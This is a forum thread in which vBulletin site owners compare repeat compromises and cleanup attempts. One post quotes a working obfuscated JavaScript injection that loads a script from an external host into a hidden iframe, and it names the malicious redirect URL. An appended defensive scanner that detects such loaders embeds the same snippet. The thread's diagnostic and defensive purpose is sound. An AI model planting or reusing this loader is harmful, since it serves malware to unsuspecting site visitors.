A fix if your site is already exploited

  • Joey805
    Senior Member
    • Jan 2004
    • 183

    #31
    I got hit with the same bug too, cleaned it and now it's back again 1 day later. I re-uploaded all my vBulletin files, changed every password possible, made sure any plugins I am running are up to date and they STILL got in.

    How the heck can we stop this from happening again? I'm about ready to start looking at other forum software.


    • Zachery
      Former vBulletin Support
      • Jul 2002
      • 59097

      #32
      Third party addons? You cleaned the damage, but did you find the source? If you move to another software and the backdoor is still in place it won't matter.

      Your addons being up to date helps, but it's not 100% if the problem is resolved. The addons you're running might still have issues, if the developer hasn't fixed them, or worse doesn't know about them.


      • J3rico
        New Member
        • Nov 2006
        • 6
        • 4.1.x

        #33
        Hi, same problem for me, vBulletin 4.1.11, but the problems started with 4.1.10. vBSEO has been updated with the patch released in January. I removed almost all the plugins/products (all products were updated to their latest version), deleted suspect file diagnostics, replaced any files not containing the expected contents, changed every password possible.
        In my case iframes are inserted in these files: init.php, content.php, vbulletin-core.js (this one only with the 4.1.11 version).
        I put lots of rules in the .htaccess file; for 10 days there were no attacks, but since last Friday they have resumed.
        I know that it's not fair to list the installed products; however, a cross-check can be of help.
        Sorry for my bad English.


        • Mr Jolly
          Member
          • Feb 2008
          • 93
          • 3.6.x

          #34
          OK, my host tells me that they removed a file called vbseo.php which they said was encoded with PHP but didn't have anything to do with vBSEO. Personally, I guessed that was a story to justify the $200 they charged me after I told them I'd managed to fix everything. But it might be relevant.

          I haven't seen this file or its contents.


          • cfages
            New Member
            • Apr 2005
            • 7
            • 3.0.7

            #35
            Originally posted by Mitchh
            Code:
            var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
            If you decode the numbers from the second fromCharCode() you get the following URL:



            This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus software like Avast complains about.

            I did get the same problem... a secret iframe that finally leads to http://directmarketingmanage.in/in.cgi?walter ... the antivirus of many of my visitors complained about it.

            Via phpMyAdmin I have found this code in 5 of my templates... I have also found a strange "new" file in the root of the forum (verify_ojdojdosjdsj.php file) with some strange code in it (admins, if you want this file I can send it to you).

            I am on vBulletin 4.0.8 Patch Level 2 (publishing suite), so I will upgrade to the latest version of vBulletin...

            For info I have 2 active plugins :
            - VBSEO (last version 3.6)
            - auto linker 1.1

            Blogs and CMS part of the publishing suite are disabled


            Any idea how they got into the system? Any patch to prevent this in the future?


            Regards
            chris

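The decoding step described in post #35, as an added example that is not part of the original thread: it decodes every `String.fromCharCode(...)` literal in a template body and flags templates whose decoded strings combine a `script`/`iframe` element name with an absolute URL. The function names and template titles are hypothetical; the sample rows are constructed and stand in for template text exported from the database, with the injected snippet copied from the post.

```javascript
// Added example: defensive template scanner, not code from the thread.

// Decode every String.fromCharCode(n, n, ...) literal found in a piece of text.
function decodeCharCodeCalls(source) {
  const pattern = /String\.fromCharCode\(\s*((?:\d{1,5}\s*,\s*)*\d{1,5})\s*\)/g;
  const decoded = [];
  for (const match of source.matchAll(pattern)) {
    const codes = match[1].split(",").map((n) => Number(n.trim()));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Flag a template when its decoded strings show the dynamic-loader pattern:
// an element name ("script" or "iframe") together with an absolute URL.
function scanTemplates(templates) {
  const findings = [];
  for (const { title, body } of templates) {
    const strings = decodeCharCodeCalls(body);
    const urls = strings.filter((s) => /^(https?:)?\/\//i.test(s));
    const createsLoader = strings.some((s) => /^(script|iframe)$/i.test(s));
    if (urls.length > 0 && createsLoader) {
      findings.push({ title, urls });
    }
  }
  return findings;
}

// The injected snippet exactly as quoted in post #35 (held as an inert string).
const INJECTED = "var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);";

// Constructed sample rows; the template titles are hypothetical.
const SAMPLE_TEMPLATES = [
  { title: "footer", body: "<div id=\"footer\">$copyright</div>" },
  { title: "headinclude", body: "<script type=\"text/javascript\">" + INJECTED + "</script>" },
];

// Returns one finding per template that carries an obfuscated loader.
function runSample() {
  return scanTemplates(SAMPLE_TEMPLATES);
}

console.log(JSON.stringify(runSample(), null, 2));
```

The same two functions can be pointed at file contents such as init.php or vbulletin-core.js read from disk, since they only operate on text.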

            • Jaxo
              Member
              • Dec 2011
              • 36

              #36
              Just out of interest... how many people having this problem are with GoDaddy?

